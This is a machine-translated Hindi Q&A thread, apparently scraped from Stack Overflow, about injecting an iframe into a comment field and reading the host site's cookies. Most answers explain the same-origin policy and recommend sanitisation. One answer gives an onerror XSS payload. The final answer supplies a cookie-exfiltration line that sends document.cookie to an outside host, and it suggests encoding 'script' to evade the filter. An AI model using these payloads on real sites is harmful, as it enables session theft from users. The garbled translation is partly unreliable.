1. घर
  2. सवाल और जवाब
  3. इफ्रेम

इफ्रेम

2011-11-28 19 views
7

के साथ क्रॉस साइट स्क्रिप्टिंग मैं क्रॉस साइट स्क्रिप्टिंग के साथ प्रयोग कर रहा हूं। मेरे पास एक वेबसाइट है जो उपयोगकर्ताओं को टिप्पणियां डालने और वेबसाइट पर देखने की अनुमति देती है। वेबसाइट टिप्पणी के बावजूद स्ट्रिंग "स्क्रिप्ट" फ़िल्टर करती है लेकिन यह iframes की अनुमति देती है। मैं समझता हूं कि मैं एक आईफ्रेम एम्बेड कर सकता हूं जो कि एक वेबसाइट को इंगित करता है जिसे मैं तैयार करता हूं और मैं जो भी स्क्रिप्ट चाहता हूं उसे चला सकता हूं। मेरा सवाल है: क्या मेरी आईफ्रेम स्क्रिप्ट मूल वेबसाइट द्वारा शुरू की गई कुकीज़ को पढ़ने में सक्षम होगी? मैंने चेतावनी (document.cookie) की कोशिश की है लेकिन यह इसमें कुछ भी नहीं के साथ एक चेतावनी दिखाता है। जब मूल ग्राहक अनुरोध करता है तो मूल वेबसाइट हमेशा एक कुकी सेट करती है। कोई विचार क्या मैं याद कर रहा हूँ?इफ्रेम

स्रोत

2011-11-28 Keeto

+1

कोशिश कर सकते हैं कर सकते हैं शब्द स्क्रिप्ट सांकेतिक शब्दों में बदलना चाहता हूँ iframe (एक ही डिमैन पर दोनों पेज), 'पैरेंट' ऑब्जेक्ट का उपयोग करें, उदाहरण के लिए 'parent.document.cookie' –

उत्तर

9

दोनों आसपास के पेज एक ही डोमेन से आने के लिए की जरूरत है। यह समान उत्पत्ति नीति द्वारा सीमित है, जिसमें कहा गया है कि एक फ्रेम में एक स्क्रिप्ट केवल उसी प्रोटोकॉल पर दिए गए किसी अन्य फ्रेम में डेटा तक पहुंच सकती है, उसी डोमेन नाम का सटीक डोमेन नाम है और उसी पोर्ट पर चल रहा है। यह दोनों फ्रेमों में दस्तावेज़ स्तर को शीर्ष स्तर डोमेन पर सेट करके थोड़ा आराम से किया जा सकता है, और इस प्रकार सबडोमेन से संचार करने के लिए फ्रेम को अनुमति देता है।

हालांकि आप इनपुट करने का प्रयास कर सकते हैं, हालांकि इसे नए ब्राउज़र में अवरुद्ध किया जा सकता है।

सीमित स्क्रिप्ट XSS को रोकने के लिए पर्याप्त नहीं है। कई अन्य तरीके हैं। http://html5sec.org और http://ha.ckers.org/xss.html

स्रोत

2011-11-28 18:22:54 Erlend

+0

अगर मैं सही ढंग से समझता हूं, तो यह दस्तावेज़ ifdomame को दस्तावेज़.डोमेन सेट करने का मामला है, है ना? * (चूंकि इसे मूल दस्तावेज़ में करने से नेटवर्क त्रुटि आती है) * – user2284570

0

जहाँ तक मुझे पता है, अगर आईफ्रेम का डोमेन मूल वेबसाइट तक पहुंच नहीं सकता है, तो मूल वेबसाइट का डोमेन अलग है, लेकिन other problems हैं। (उदा। पटाखा <img src="asdf" onerror="alert(document.cookie)"/> टिप्पणी)

आप HTML Purifier तरह somethings उपयोग कर सकते हैं ....

स्रोत

2011-11-28 04:12:25 JiminP

1

कुकीज़ समान मूल नीति का पालन करें। तो यदि हमला वेबसाइट और पीड़ित वेबसाइट (जो iframes को खोलने की अनुमति देती है) एक ही होस्ट कर रहे हैं तो चल रहे दस्तावेज़.cookie पर पॉपअप कुकीज़ जानकारी को स्वीकार करेगा। चूंकि आपके मामले में वे भिन्न डोमेन होने लगते हैं कुकी चोरी करना संभव नहीं होगा। एक्सएसएस को बेहतर तरीके से रोकने के लिए सी का उपयोग करना है: कोर जेएसटीएल लाइब्रेरी

स्रोत

2013-05-28 06:28:27 vivek

3

आपने इसे ध्वनि बना दिया है जैसे आप एक्सएसएस के लिए पेलोड के रूप में कुकी का उपयोग करने की कोशिश कर रहे हैं?

क्या आप वास्तव में कुकी चोरी करने की कोशिश कर रहे हैं?

लेकिन यदि साइट आपको टिप्पणियां डालने और केवल "स्क्रिप्ट" को हटाने की इजाजत दे रही है तो आपके पास कोच्ची चोरी स्क्रिप्ट समेत एक्सएसएस डालने के विकल्पों का एक गुच्छा है।

प्रयास करें इस

javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;

लेकिन आप के बजाय आप एक से एक माता पिता के पृष्ठ पर पहुंचने के

स्क्रिप्ट

या यूनिकोड 73 63 72 69 70 74

स्रोत

2014-01-22 18:36:03 user3224677

संबंधित मुद्दे

 संबंधित मुद्दे